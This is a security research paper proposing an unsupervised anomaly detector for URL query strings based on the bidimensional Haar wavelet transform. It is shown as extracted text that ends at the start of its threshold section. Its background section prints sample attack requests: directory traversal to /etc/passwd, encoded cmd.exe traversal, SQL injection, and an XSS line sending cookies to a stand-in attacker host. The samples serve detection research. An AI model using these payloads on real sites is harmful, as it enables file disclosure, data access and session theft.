URL query string anomaly sensor designed with the bidimensional Haar wavelet transform

Int. J. Inf. Secur.DOI 10.1007/s10207-015-0276-y

REGULAR CONTRIBUTION

URL query string anomaly sensor designed with thebidimensional Haar wavelet transform

Alice Kozakevicius · Cristian Cappo · Bruno A. Mozzaquatro ·Raul Ceretta Nunes · Christian E. Schaerer

© Springer-Verlag Berlin Heidelberg 2015

Abstract In this paper, the 2D Haar wavelet transform isthe proposed analysis technique for HTTP traffic data. Webattacks are detected by two threshold operations appliedto the wavelet coefficients of the 2D transform: one basedon their median and the other on the best approximationmethod. The two proposed algorithms are validated throughan extensive number of simulations, including comparisonswith well-established techniques, confirming the effective-ness of the designed sensor.

Keywords Anomaly detector ·2D Haar wavelet transform ·Thresholding · Best approximation method

1 Introduction

Attack detection mechanisms to web-based applications haverecently received considerable attention, specially intrusiondetection systems (IDS) that monitor HTTP-related activi-ties [17,21,23,33,37]. This is mainly due to the increasingrole that these applications are playing in the society, as well

A. Kozakevicius · B. A. Mozzaquatro · R. C. NunesTechnology Center, Federal University of Santa María,Av. Roraima, 1000, Santa María, RS 97105-900, Brazile-mail: [email protected]

B. Mozzaquatroe-mail: [email protected]

R. C. Nunese-mail: [email protected]

C. Cappo (B) · C. E. SchaererPolytechnic School, National University of Asunción,San Lorenzo, Paraguaye-mail: [email protected]

C. E. Schaerere-mail: [email protected]

as, the lack of adequate techniques for debugging their possi-ble vulnerabilities. Attacks attempt to exploit vulnerabilitieseither to violate the system security or to affect its avail-ability [10]. An analysis of the common vulnerabilities andexposures (CVE) repository [41], as described in [34], showsthat web-related security flaws account for more than 49 %of the total number of reported vulnerabilities from 1999to 2009. The CVE repository contains only known applica-tion vulnerabilities; therefore, the number of vulnerabilitiesincreases when considering custom-developed web applica-tions by the organizations.

The design of an efficient IDS contributes to maintain theservice availability, allowing quick responses to attacks, forinstance, the change of rules in firewalls. According to [1],an IDS can be seen as part of a fault prevention mechanismallowing the obtainment of dependability and security of theanalyzed systems. In this sense, there are two IDS approachesfor protecting computer systems [20]: approaches based onsignatures and anomaly-based ones.

The main difference between them consists in the assump-tion of previous knowledge about anomaly patterns. Thesignature-based methods identify attacks through a previ-ously established signature analysis, which considers priorknowledge of the attack patterns. For the anomaly-basedapproach, on the other hand, this assumption is no longer con-sidered. The analysis is based on the observation of any sub-stantial variation of any specific characteristic with respect tothe commonly determined behavior, which is usually deter-mined through machine learning or statistical techniques.

Signature-based approaches have the advantage thatknown attacks can be reliably detected with a low false-positive rate. However, they have two major drawbacks: Theyare only able to detect attacks with known patterns, and theyrequire extensive management and maintenance of the sig-natures databases in order to provide reliable detections. As

123

A. Kozakevicius et al.

a consequence, they leave the system wide open to the so-called zero-day attacks for which no pattern signatures norvariation of known attacks (polymorphic attacks) are avail-able. Note that for an attack to proceed, it only takes oneoutdated signature [23].

Anomaly-based detections have been explored as an alter-native approach because they can potentially detect novelattacks [17,21,37,44], as well as capturing patterns that donot match any well predefined or standard behavior [3]. Thus,in the context of web-based applications the adoption of anyapproach from this type has the following advantages: (a) norequirement of a priori knowledge of the web application,(b) capacity of self-adaptation to periodic maintenance ofthe web applications in focus, (c) polymorphic and unknownattacks detection capacity and (d) custom-developed webapplications protection skills.

The code or content injection is one of the most exploredactions to attack web applications. The SQL injection andcross-site-scripting (XSS) attacks are two examples of it. Asa consequence of these malicious insertions, some HTTPrequests can present anomalies in its character distribution.This paper explores the variations on URL query string (thevalue of query component in the http URL) that appears astarget in the large majority of web attacks [29,40]. Thesekinds of attacks can cause a significant alteration of the char-acter distribution in the URL query string. An example is aDirectory Traversal attack, which is characterized by a bigquantity of “.” or “/” characters in relation to the quantity ofall other remaining characters [33]. This attack attempts togain access to files, directories, and commands that poten-tially reside outside the web document root directory.

In the context of web IDS, some approaches were pro-posed for analysis of the URL query string character distri-bution [19,21,38]. A common feature of them is the depen-dency on statistical measures of standard behaviors, usuallyreferred as normal (usual) profile, which are built based on adata set without anomalies (training data). Their generationstep is, therefore, referred as training phase [30]. In an anom-aly detection system, however, the obtainment of the normalprofile is a challenge [18], mainly because of the acquisitiondifficulties of an attack-free training data that can representall real activities.

When considering the usage of a normal profile, the anom-aly detection algorithms can operate in three modes [3]:supervised, semi-supervised and unsupervised. The super-vised anomaly detection assumes availability of the train-ing as well as the anomaly data sets. In the semi-supervisedanomaly detection mode, only the training data set is avail-able. Finally, the unsupervised anomaly detection mode doesnot require any training data set.

This paper presents an unsupervised anomaly detectionalgorithm for URL query string based on the bidimensionalHaar wavelet transform. The wavelet transform allows the

extraction of information from the analyzed data in differentresolution levels, independently of any other data containedin the system [27]. As a result, no training phase is required,avoiding any kind of previous knowledge of data sets withoutattacks. To the best of the author’s knowledge so far, there isno available unsupervised anomaly algorithm that searchesattacks in the URL query strings.

The one-dimensional wavelet transform provides two setsof coefficients in each level of factorization: the scaling andthe wavelet ones. Scaling coefficients represent mean trendsof the original data. The wavelet coefficients capture all varia-tions and perturbations with respect to this trend contained inthe data at each resolution level of the transform. As a conse-quence of its definition, one of the most important propertiesof the wavelet transform consists in its extreme sensitivityin capturing non-smooth characteristics of the data such asnoise, jumps and spikes. This property turns wavelet trans-forms into a promising tool in the detection of outliers [13]for many kinds of input data.

The one-dimensional wavelet transform has been success-fully used as an efficient anomaly recognition tool in networkIDS [14,25]. However, one-dimensional wavelet transformsare not adequate to detect URL query string anomalies. Onemain reason is because the detector needs to verify characterfrequency changes in one request and also, at the same time,in a set of many requests in order to identify what variationsare significant.

The algorithms presented in this work explore the bidi-mensional Haar wavelet transform to allow the analysis ofthe abrupt changes in different directions of a characterper request matrix. The potential of the bidimensional Haarwavelet transform as an efficient tool for network data analy-sis has been initially investigated in the work [28]. In this pre-vious work, web attacks were detected through the truncationof the wavelet data representation, considering a hard thresh-old strategy [7] and simple choices for the threshold parame-ters. In the present work, this initial study is then detailed andmore robust strategies for the determination of the thresh-old values are proposed and investigated, since the thresholdoperation is one of the main ingredients in the attack waveletanalysis. Once the two-dimensional wavelet transform pro-vides wavelet coefficients that captures data variations inthree directions (vertical, horizontal and diagonal), the rele-vant aspect now is that the contribution of each of these threesets of wavelet coefficients is involved in the determination ofsuitable threshold values, allowing an increase in the rate ofcorrect attack detections, as the numerical experiments willdemonstrate. The other main contribution here with respectto the previous work is the design of a refinement step inour analysis algorithms, bringing more efficiency in the pre-sented detection strategy.

The paper is organized as follows. The background ofweb attacks and usual techniques used for their detections

123

URL query string anomaly sensor

are reported in Sect. 2. In Sect. 3, character distribution char-acteristics are described. Plots in 2D and 3D are also pre-sented in order to highlight the effects caused by malignantcharacter insertions on HTTP requests. The features of thewavelet-based algorithms based on 1D and 2D transformsare presented and discussed in Sect. 4. Two important thresh-old operations for the wavelet coefficients are also presentedin the end of Sect. 4, since they will be responsible for thewavelet-based intrusion detection sensor proposed in Sect. 5.In Sect. 6, the two proposed wavelet-based algorithms forintrusion detection taking into account the presented trunca-tion strategies are tested. The efficiency of the proposed 2Danalysis is verified by comparisons between 1D and 2D for-mulations of the proposed sensor. In order to put the presentedproposal in the context of other existing methodologies, anextensive number of numerical simulations and comparisonswith well-established algorithms are made, whose results aresummarized in tables presented in Sect. 7.

Final considerations with respect to correlated works aresummarized in Sect. 8, and conclusions are presented inSect. 9.

2 Detection and characteristics of web attacks

This section describes the anomaly-based detection tech-niques that have been used to detect web attacks related toinjection-based techniques (Sect. 2.1). Here, some signaturesof web attacks are also highlighted to demonstrate the anom-alous behavior commonly generated by them (Sect. 2.2). Todiscuss signatures is important to understand what we con-sider as an anomaly in our proposal and to learn how theattacks are performed.

2.1 Web detection techniques

Anomaly detection techniques traditionally are based on theassumption that attacks generate variations on the so-callednormal (usual) behavior. Thus, a common strategy to detectanomalies consists in the definition of a normal profile andconsequently any observation that do not match with the nor-mal profile will be considered anomalous. The choice of thematching operation depends on the technique assumptions[3]. In the following, we describe the two main approachesused in web anomaly detection techniques.

2.1.1 Works based on character distribution

In this approach, anomalies are detected considering behav-ior analysis of the character (or bytes) distribution. The basichypothesis is that requests (e.g., HTTP requests) have a reg-ular structure and an attack occurrence disturbs the characterfrequency distribution of requests. This approach is imple-

mented in [19,21,22,24,38]. In all these references, the samestatistical hypothesis test is used: the Pearson Chi-squaregoodness-of-fit test [31] that compares the character distribu-tion of a normal profile with the current request. Other workshave used different tools for determining similarity betweendistributions (e.g., in [44] the Mahalanobis distance [26] isconsidered).

Kruegel et al. [24] have applied the concept of anomaliessearch in the character distribution of IP payload. Their modelbuilt a normal profile for each analyzed service using threemeasures of normality: the frequency character distribution,the request length (e.g., domain name length in DNS or URLlength in HTTP) and the request type (e.g., in DNS: PTR,A, MX, SOA). In the case of frequency character distribu-tion, they group the relative frequency of characters in sixpredefined bins of groups. After this, these bins are sortedin decreasing order. The anomaly probability is obtained bystatistical hypothesis test. The final anomaly score is thenobtained using a weighed sum of results of the three mea-sures. In [24], however, only DNS traffic was investigated.In a second work, Kruegel et al. [21] applied the same typeof models to the URL string of each CGI script and a normalprofile was built for each web application.

In the case of character distribution model, the samemethodology presented in [24] is used for detecting anom-alies. The final anomaly score is obtained also using aweighed sum of anomaly probability of each model and thenusing a threshold to consider a request anomalous or not.The character distribution model has showed effectivenessin detecting the majority of web attacks such as DirectoryTraversal, Buffer Overflow and XSS.

Variations of [21] in the use of character distribution mod-els to detect attacks in web applications are presented in [19]and [38]. In [38], the same models used on [21] were pre-sented but with a different grouping criterion for the characterdistribution model. More precisely, instead of using six bins,three bins were constructed, one for alphabetical characters,another for numbers and a third bin for special symbols. Thisapproach reported better results according to the proposedgrouping.

Another way of data grouping was presented in [19],considering a process named Yate’s correction [45], wherethe number of bins was dynamically created. In [19], nosorting was applied to determine the bins. Then, the Pear-son Chi-square test for comparing the character distributionwas also considered. The authors claimed that this dynam-ical grouping did not lose the information structure of therequest, because the relation between characters and their fre-quency was preserved, allowing the detection of more subtleattacks and specifically SQL injection attacks. Nevertheless,the grouping in [21] treated the character distribution in avery coarse way, missing important relationships betweenthe characters, as pointed out in [44] and in [19].

123


Character distribution models were used also in the worknamed payload-based anomaly detector (PAYL) presentedby Wang and Stolfo [44]. The presented detector inspectedthe payload of TCP request of network traffic. The byte fre-quency distribution was computed, and the standard devia-tion of application payloads of network services was groupedby length. PAYL used a variation of the Mahalanobis distance(the simplified Mahalanobis distance) to detect the similaritybetween the byte distribution of normal profile and the cur-rent payload. The Mahanalobis distance is a global anomalydetection method that determines the center of mass of dataμ and the variance of each dimension σi in the input space.In this case, each dimension corresponds to a ASCII charac-ter.

Character distribution was also explored in [18] where cor-relations among different features were considered. In thiscase, 256 ASCII characters of first 150 bytes of HTTP GETrequest. The algorithm computed the average frequency ofeach ASCII character, also the mean and variance. After-wards, the correlations among 256 ASCII characters werecalculated, forming the Mahalanobis Distance Map (MDM)of requests (a matrix of 256 × 256). This map reflectedthe characteristics of character frequency and the relationsbetween them. In order to detect anomalies, a weight factorwas calculated between the MDM of normal requests and theMDM of current request.

As pointed out in the above-mentioned works, the analysisof the character distribution is a valid approach to observe theanomalies caused by attacks. The difficulty stays in findingthe precise and convenient way to compare the normal withthe anomalous distributions.

Our proposed methodology is also based on the analysisof the characters distributions, but with the main advantageof avoiding training phases based on the knowledge of a freeof attack data set.

2.1.2 Works based in n-gram analysis

In contrast to individual characters, byte sequences reflectspecific pattern of normal (usual) data and those with attacks.These byte sequences can be represented by fixed-lengthlanguage model named n-grams [2]. A n-gram is simply asubstring generated by sliding a window of length n acrossa string, which might be the whole request or part of it.The result is a set of string of length n. A special caseof n-gram analysis is 1-gram, that is, the byte level analy-sis, which was presented in the first part of this subsec-tion. This technique was used initially in a natural lan-guage processing (e.g., text categorization and classification[2,5]) and extensively applied in host intrusion detection sys-tem [11,12] and later in network intrusion detection system[32,43].

In web IDS, the n-gram analysis is explored in severalworks [16,23,37]. The idea behind the use of n-gram analysisis the detection of deviations in the regularity of the n-gramsof HTTP requests. This regularity can be observed analyz-ing only the presence or absence of n-grams in the analyzedrequest with respect to normal n-grams [16]. Furthermore,this analysis might include the relationships between onen-gram with respect to others [37]. That is, what is the likeli-hood that one n-gram is expected to have when other n-gramswere observed? This observation possibly discriminates validn-grams, corresponding to normal data, and n-grams corre-sponding to anomalies.

In [16], to generate a measure of similarity or anomaly, thepresence or absence of the request n-grams is compared withthe set of learned n-grams obtained during the training phase.The detection model simply computed the ratio between thenumber of n-grams of the current request of the set of normaln-grams and the total of n-grams of the current request. Aratio close to unit indicates that the request is normal. In [23],the n-gram analysis was used as one of its anomaly detectormodels of a web application firewall. This model considersall possible n-grams over byte sequences S = {0, . . . , 255}nand then defines the embedding function φ for a request valuex such that φ(x) = ((φs(x)))s∈S ∈ R

|S| with φs(x) = bs(x)

where bs(x) returns 1, if the n-gram s is contained in x and0, otherwise. The detection is performed using the Euclideandistance between the resulting vectors φ(x) and the vector μ

which is constructed from the training data as an arithmeticmean of the respective embedding vectors.

The use of n-gram analysis for determining relationshipsamong themselves was used in [37] to model the string con-tained in the URL of GET request and the message body ofPOST HTTP request. A mixture of Markov chain was usedto capture a representation for not only content but also thestructure of script argument string (the query string of theURL) by learning a proper distribution on the overlappingn-grams. The resulting method has a high detection accuracyfor a variety of web-based attacks.

Finally, the n-gram analysis enables the study of the behav-ior of HTTP requests by enabling the representation of datain compact form and by allowing the recognition of relationsamong them. However, there are two main problems withn-gram analysis. One is the space required for representingall possible n-grams of the ASCII alphabet, and other is thedifficulty in determining an efficient method for accessingcorrectly the data structure that contains the normal n-gramsin order to compare the current request.

The methodologies based on n-grams and on the nor-mal distribution of characters enable the identification in theHTTP requests of anomalies, which can be consequence ofcode injection attacks. In the following, we describe the mostcommon web attacks related to code injection that modify theURL query string.

123


2.2 Attacks in HTTP request: URL query string

Web-based facilities are designed to provide web pageaccess, to allow multiple users to perform specific tasks andto provide web services, just to mention a few examples.The so-called normal (standard) HTTP requests present asimilar structure in the same web application. However, ingeneral due to a lack of security-related internal proceduresin the software development process, the web applicationsmay present several vulnerabilities [42].

In fact, new web application vulnerabilities are discoveredeach day, and this diversity of vulnerabilities are explored byattackers to violate different security mechanisms that shouldbe enforced by the application. Some of the violations can beobserved as variations in structure of normal requests [15].

Among web attack possibilities, we have focused on theURL query string which inserts malicious data [40]. Table 1presents the most popular security risks during the year of2010 and shows the query field if the request location wasone of the most explored by attackers. The attacks on querycan cause variations in the query character frequency, spe-cially A1 (injection) and A2 (cross-site scripting). In fact, theattacks A1 and A2 are the most prevalent in web security andare the main subject of this work.

Consider the well-known Directory Traversal attack, aninstance of injection attack (A1 in Table 1). This attackexplores vulnerabilities during the validation process of datainformed by users [33]. Its main goal is to damage the accesscontrol to web server directories, allowing access to restrictfiles. Its signature is well known and uses a high quantity of“.” and “/” characters (content injection). An example of itssignature used for reading the contents of the passwd fileon an UNIX system is shown as follows:

GET /page.php?p=../../../../../../../../etc/passwd%00

Note that the Directory Traversal attack attempts to moveoutside of the web document root to get access to the system

Table 1 OWASP top 10 web application security risks [29]

No. Attack Location

A1 Injection Query

A2 Cross-site scripting (XSS) Query

A3 Broken authentication and session management Query

A4 Insecure direct object references Query

A5 Cross-site request forgery (CSRF) Query

A6 Security misconfiguration –

A7 Insecure cryptographic storage Query

A8 Failure to restrict URL access Query

A9 Insufficient transport layer protection –

A10 Unvalidated redirects and forwards Query

files. It succeeds because many web applications do not verifythe location and content of the file requested in the web server[35]. A common technique used by attacker to hide it consistsin decoding the URL characters as follows:

GET %47%45%54%20%2F%73%63%72%69%70%74%73%2F%2E%2E%2F%2E

%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%77%69%6E%6E

%74%2F%73%79%73%74%65%6D%33%32%2F%63%6D%64%2E%65%78%65

%3F%2F%63%20%64%69%72%20%48%54%54%50%2F%31%2E%30

Note, however, that decoding does not eliminate the char-acter frequency variation. A similar behavior occurs in code-red attack (A1). This attack explores the Buffer Overflow tocause a denial of service with a large number of characters inthe HTTP query [4], as can be seen below with “X” characterinjection.

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX(...)

These examples show injection contents that cause chan-ges in the character frequency on URL queries.

Another way to explore web application vulnerabilitiesthought unusual characters consists in injecting codes insteadof contents. The instance, the SQL injection(A1) web attackinjects SQL codes in URL queries to try prohibited access indata bases. However, as shown through the example below, italso changes the common structure of the query and generatesvariations on the character frequency [9].

GET /page.php?p==%27/**/+union+/**/select

/**/+1,2,3,version(),user(),6/**/–+

Cross-site scripting (XSS) is another very common webattack that explores code injection. The goal is to inject client-side script into the web server to change the behavior of theweb sites. In the following, we exemplify a normal GET

request and a modified request that changes the Joe user-name for a script that modifies the document.location

attribute.

GET /index.php?sessionid=12312312&username=Joe

GET /index.php?sessionid=12312312&username=<script>document.location=‘http://attackerhost.example/cgi-

bin/cookiesteal.cgi?’+document.cookie</script>

Similar to SQL Injection, XSS attack and its variationsneed to put additional information on the URL queries. Thisalways implies in variations in the frequency of charactersand might be captured by anomaly-based web detectors.

3 Character frequency distribution characteristics

This section presents and discusses the three-dimensionalrepresentation of the character frequencies from web requests,which will be further explored by the proposed methodology.This representation (ASCII character × character frequency

123


Fig. 1 Example of HTTP request registered in the log file

Fig. 2 Input data matrix, containing the frequencies for each ASCIICharacter (row) at each HTTP request (column)

× requests) allows to understand how a web attack affects thecharacter frequency and how it is translated into the requestmatrix. In order to explore the structural aspects involved inthe analysis of URL query string, the graphics of the bidi-mensional representation (ASCII character × requests) areincluded, where the character frequency is plotted changingits color intensity. Our analysis is made by considering a ref-erence data set (without attacks) and its variations with oneand two attacks, where the two types of considered attacksare: Directory Traversal attack and XSS attack. The behaviorof these attacks was discussed in Sect. 2.2.

Considering a web application named “page.php” thatreceives one parameter p, Fig. 1 exhibits the GET portionof the application HTTP requests, obtained from web serverlog files. In the figure, the URL query string is underlined,[IP] means the client IP number and [TS] means the timestamp of the request.

The character frequency associated to the collected data(logs) is organized in the input data matrix. Figure 2 showsthe matrix organization, where the rows are assigned for the256 ASCII characters and the columns are reserved for the256 HTTP request taken into account. Note that the requestset corresponds to the attack analysis window.

The analysis window used in this section was collectedfrom the border of a real web server and their data were care-fully analyzed to clean any possible attack, to produce a dataset without attacks. The associated frequency distributionsof ASCII characters contained in the requests window are

0 50

100 150

200 250 0

50 100

150 200

250

0

1

2

3

4

5

6

(a)

ASCII

HTTP Request

Frequency 0

50

100

150 0 50 100 150 200 250

ASC

II

HTTP Request

(b)

0

1

2

3

4

5

6

Fig. 3 Data without attacks. a 3D representation; b 2D view with thefrequency intensity scale

0 50

100 150

200 250 0

50 100

150 200

250

0 2 4 6 8

10 12 14 16

(a)

ASCII

HTTP Request

Frequency 0

50

100

150 0 50 100 150 200 250

ASC

II

HTTP Request

(b)

0

2

4

6

8

10

12

14

A1

Fig. 4 Data with 1 attack: one Directory Traversal attack (A1). a 3Dfrequency representation, b 2D representation with the frequency inten-sity scale

shown at Fig. 3a. Its x axis contains 256 HTTP requests, andthe y axis contains the 256 ASCII character frequencies (fre-quency of occurrences). The corresponding bidimensionalrepresentation of the frequency intensities is also provided(b) for the same data set. Note that the characters of the URLquery string are kept in a common region. For this particularwindow and application, the region includes the characterswhose ASCII value is between 45 and 130. The graphic isclosed to the period from 0 to 150 only for zoom purposes. Insummary, this graphic shows: first, that for a single character,the difference on character frequency among various requi-sitions is quite regular (the color in Fig. 3b remains similarthrough the window horizontal lines); and second, in requeststo the same application, the frequency distribution of distinctcharacters remains stable.

Figure 4a shows the data set after the injection of a Direc-tory Traversal (A1) attack that puts 9 times the “../” stringon the 25th URL request to get access to root directory. Fig-ure 4 uses different scale than Fig. 2 to show the effect ofthe attack. Note the number of “.” and “/” characters (respec-tively, 46th and 47th positions on ASCII table) increase sig-nificantly when compared to usual request character. Thisincrement can be observed also in Fig. 4b at point A1 thatrepresents a big character frequency.

Injection-based attacks should generate similar behaviorthan showed in Fig. 4. To demonstrate this characteristicbehavior, a not decoded XSS attack interested in cookiestealing is considered, as the one presented on Sect. 2.2.

123


0 50

100 150

200 250 0

50 100

150 200

250

0 2 4 6 8

10 12 14 16

(a)

ASCII

HTTP Request

Frequency 0

50

100

150 0 50 100 150 200 250

ASC

II

HTTP Request

(b)

0

2

4

6

8

10

12

14

A1 A2

Fig. 5 Data with 2 attacks: one Directory Traversal attacks (A1) andone XSS attack (A2). a 3D frequency representation, b 2D view withthe frequency intensity scale

This attack injects a script containing alphabetic tiny let-ters (ASCII values from 97 to 122), dots and others ASCIIcharacters and can be observed in Fig. 5. The points A1 andA2 indicate the columns of the modified requests, where A1indicates the Directory Traversal attack and A2 indicates theXSS attack. Figure 5a shows the spikes, and Fig. 5b allowsto identify the columns/requests of changes.

The examples presented in this section show the impact ofinjection-based web attacks on a character matrix of a webrequest window. Hence, it is possible to point out that thiskind of attack changes the character frequency distributioncausing anomaly events on the matrix formed by request Xcharacter. These events are suitable for being detected bybidimensional transforms, as it will emphasized in the nextsections.

4 Wavelet-based algorithms

Many wavelet families are available. However, in order topresent the main ideas and to investigate their applicabilityfor the traffic analysis, we chose the Haar wavelet familyfor its simplicity in terms of implementation, direct applica-tion (even when boundary conditions have to be taken intoaccount) and possibility of having fast algorithms for bothone- and bidimensional discrete transforms. Another rele-vant advantage is that the localization of the significant datavariations are better preserved by the Haar wavelet transform,since the transformation is based on simple mean computa-tions between two consecutive neighbors.

The assumption behind the fast implementation to performa 2D discrete wavelet transform is that the wavelet 2D fam-ily is obtained as a tensor product of wavelet 1D functions.For a complete mathematical discussion about wavelets, see[6]. A more intuitive explanation, including some interestingrepresentations for the 2D Haar wavelets, is given in [39].The algorithms implemented in this work for the fast bidi-mensional transform are based on the formulations proposedin [39].

A possible fast implementation applies the 1D wavelettransform firstly for each one of the input matrix rows andthen performs the same one-dimensional transform for eachone of the matrix columns [39]. In this sense in Sect. 4.1, the1D Wavelet transform is formulated, while a complete 2Dalgorithm is presented in Sect. 4.2. Finally, two very impor-tant operations are briefly pointed out in Sects. 4.3 and 4.4:the threshold operation and the best approximation method,which are responsible for the selection and truncation of thewavelet coefficients, allowing the identification of significantdata variations. These operations are the core of our alarmdetection system.

4.1 1D wavelet transform: TW1D

The pseudocodes of Algorithms 1 and 2 are presented tocalculate one- dimensional discrete wavelet transform.

The first half of vector C ′ stores the scaling coefficients,which are responsible for capturing the coarser informationcontained into the signal at each level. The second half ofC ′ contains the wavelet coefficients from the transformation.They capture all variations with respect to the coarser trendat each level.

The Haar transform is determined by the convolution ofthe signal with its corresponding filters of size two. The filterscan be given in the standard form h = { 1

2 , 12

}, g = { 1

2 ,− 12

}

or in the normalized form, h ={

1√2, 1√

2

}for the scale coef-

ficients and g ={

1√2,− 1√

2

}for the wavelet coefficients

computation.Here, we consider the normalized version, once it pre-

serves the energy of the entire signal through the decomposi-tion levels, avoiding any distortion of the wavelet coefficients,caused by the scale.

Therefore, the Haar wavelet decomposition of a functionat each level presents data through piecewise constant func-tions (associated to the scaling coefficients) and a set of vari-ations necessary to recover the original data. These variationsare then represented by the wavelet coefficients.

Despite given a simplified representation of the originalsignal, the 1D Haar wavelet transform is efficient to capturedata variations, without loosing the position where this vari-ation occurs into the signal.

Note that the given algorithms execute the complete datadecomposition, i.e., until only one element is contained inthe coarsest representation level.

Nevertheless, the wavelet decomposition could alsoassume any other intermediate level as the coarsest one forthe transformation, where the factorization can be ended, i.e.,a partial decomposition. In fact, in many applications it mightbe useful to perform a partial decomposition, choosing themost convenient level to stop the factorization. Here for the

123


Algorithm 1: Decompositioninput : C : Array of dataoutput: C ′ : Array of data

1 N ← |C |2 C ′ ← C3 while N > 1 do4 C ′ ← DecompositionStep(C ′)5 N ← N

26 end7 return C ′

Algorithm 2: Decomposition stepinput : C : Array of dataoutput: C ′ : Array of data

1 N ← |C |2 C ′ ← 03 for i ← 1 to N

2 do4 C ′[i] ← (C[2i − 1] + C[2i])/√2

5 C ′[ N2 + i] ← (C[2i − 1] − C[2i])/√2

6 end7 return C ′

0

1

2

3

4

5

1 50 100 150 200 250

Freq

uenc

ies

0

1

2

3

4

5

200 210 220 230 240 250

0

1

2

3

4

5

1 50 100 150 200 250

Sca

le C

oeffi

cien

ts

0

1

2

3

4

5

200 210 220 230 240 250

-2.5-2

-1.5-1

-0.50

0.51

1.52

1 50 100 150 200 250Wav

elet

Coe

ffici

ents

HTTP Request

-2.5-2

-1.5-1

-0.50

0.51

1.52

200 210 220 230 240 250

HTTP Request

(a) (b)

(c) (d)

(e) (f)

Fig. 6 TW1D by rows—one level decomposition. a o (ASCII = 111)character frequency per request, c scale coefficients, e wavelet coeffi-cients. Corresponding zooms on b, d and f

alarm generation, only one or two decompositions levels willbe enough.

In order to illustrate different data behaviors accordingto the directions that are analyzed, Figs. 6 and 7 show theTW1D executed by rows and columns, respectively.

Both figures show data represented by piecewise con-stant functions when representing scaling coefficients, andthe wavelet coefficients are represented by variations.

In Fig. 6a, the graph for the frequencies of the ASCII =111 character per request is presented. On part (b), a zoomon the interval [200,255] is given. On part (c), the scalingcoefficients are shown and the correspondent zoom is given

05

1015202530

1 50 100 150 200 250

Freq

uenc

ies

05

1015202530

40 50 60 70 80 90 110 120

05

1015202530

1 50 100 150 200 250

Sca

le C

oeffi

cien

ts

(c)

05

1015202530

40 50 60 70 80 90 110 110 120

(d)

(a) (b)

-202468

10

1 50 100 150 200 250Wav

elet

Coe

ffici

ents

ASCII Character

(e)

-202468

10

40 50 60 70 80 90 110 110 120

ASCII Character

(f)

Fig. 7 TW1D by columns—one level decomposition. a Characters fre-quency for request number 10, c scale coefficients, e wavelet coeffi-cients. Corresponding zooms on b, d and f

on Fig. 6d. Finally, the wavelet coefficients (e) and the cor-responding zoom (f) are shown on Fig. 6.

In Fig. 7, the graphs correspond to the TW1D applied to thecharacters distribution for the request number 10, meaningthat the wavelet transform this time acts over the columnsof the input matrix. It is possible to observe a completelydifferent profile, since now it is evident that not all charactersare considered on the request number 10. The zoom is nowon the frequencies for ASCII values in the interval [40,120].

4.2 2D wavelet transform: TW2D

The fast algorithm for any bidimensional wavelet transformusually performs the one-dimensional wavelet transform asindependent processes on each dimension (row and column)of the 2D input data. The order the operations are executedcan generate different types of algorithms for the bidimen-sional transformation, i.e., producing different sets of scalingand wavelet coefficients. For more details in a very experi-mental approach, see [39].

In this work, the fast 2D Haar wavelet transform isobtained by the standard procedure, in which the 1D Haarwavelet transform is performed initially for all rows and thenfor all columns of the resultant matrix. Figure 8 illustratesthis process for one complete level of transformation. Whenapplying the 1D wavelet transform on rows, the original dataon each row is compressed [label (c)] and set of wavelet coef-ficients [label (d)] is generated. The same occurs when apply-ing the 1D wavelet transform on columns. But this processnow is performed considering the already transformed data.As a consequence, four distinct blocks of coefficients are gen-erated, one representing information in a coarser level(cc),and three blocks representing the variations in three differentdirections (cd, dc, dd), as presented in Fig. 8.

123


Datax[n][n]

Mean(c)

Detail(d)

Means(cc)

Details(cd)

Means(dc)

Details(dd)

Fig. 8 Matrix x[n][n] decomposition applying the bidimensionalwavelet transform

When more levels are performed, the only block associ-ated with the “mean of means” [in Fig. 8 block (cc)] will bedecomposed; i.e., only the scaling coefficients from the pre-viously obtained level will be decomposed. The other threeblocks related to the wavelet coefficients remain untouched.In Fig. 8, these blocks are labeled as (cd), (dc) and (dd). Asa result, when the entirely 2D wavelet transform is finallyapplied on the input matrix, not only the lines are automat-ically analyzed, but also the columns. And the variationsamong lines, columns and their combinations, translated byvariations in the diagonals of the input matrix, are capturedby the three blocks of wavelet coefficients generated by thebidimensional transform.

In the specific application object of this paper, the com-prehension of the bidimensional wavelet transform brings acomplementary understanding to the possible attack behav-iors, with respect to perturbations that affect no only neigh-bors in one single direction but in all a vicinity around theattack event. This was not noticed before, when only one-dimensional transforms were applied to the network data[14,25,36].

Figure 9a shows a representation of the coefficients storedin each of the four blocks of the 2D Haar wavelet transformafter one decomposition level. The input matrix for this casecorresponds to the same data used in Fig. 3, which does notcontain attacks. In order to recover the data on the originalresolution level, the inverse transform should be applied tothe entire sets of coefficients. In spite of having the infor-mation represented in a coarser resolution, then the inversetransform should be applied on block (cc) and consideringalso all other blocks receiving null values. But this is notthe goal in the present work. No inverse transform will beapplied, since the wavelet coefficients will be used only forthe alarms generation. To improve the visualization, we showthe values of the coefficients in absolute value. Figure 9b isthe bidimensional representation of the four blocks, wherethe coefficient intensity is given by the color palette. Here,the location of the information on the matrix after the trans-formation is no longer related to the original positions ofthe input data matrix, but the original ones can always berecomputed.

Figure 10a represents the sets of coefficients for the bidi-mensional Haar wavelet transform for the data presentedin Fig. 4, containing one Directory Traversal attack, and

0 50

100 150

200 250 0

50 100

150 200

250

0

1

2

3

4

5

6

(a)

ASCII

HTTP Request

abs(

Coe

ffici

ent)

0

50

100

150

200

250

0 50 100 150 200 250

ASC

II

HTTP Request

(b)

0

1

2

3

4

5

6

(cc) (cd)

(dc) (dd)

Fig. 9 TW2D of data presented in Fig. 3. a 3D representation ofwavelet transform without attacks. b Same data in 2D view with thefrequency intensity scale. Each block is labeled (cc, cd, dc and dd)

0 50

100 150

200 250 0

50 100

150 200

250

0 2 4 6 8

10 12 14 16

(a)

ASCII

HTTP Requestab

s(C

oeffi

cien

t)

0

50

100

150

200

250

0 50 100 150 200 250

ASC

II

HTTP Request

(b)

0

2

4

6

8

10

12

14

(cc) (cd)

(dc) (dd)

Fig. 10 TW2D of data presented in Fig. 4. a 3D representation ofwavelet transform with 1 attack. b Same data in 2D view with thefrequency intensity scale. The circles show the attack position in eachblock

Fig. 10b shows the intensity of the coefficients through abidimensional representation. Here, it is possible to observethe impact the attack caused in the magnitude of the waveletscoefficients in a very localized neighborhood. We show incircles the attack position in each block.

4.3 Threshold operation

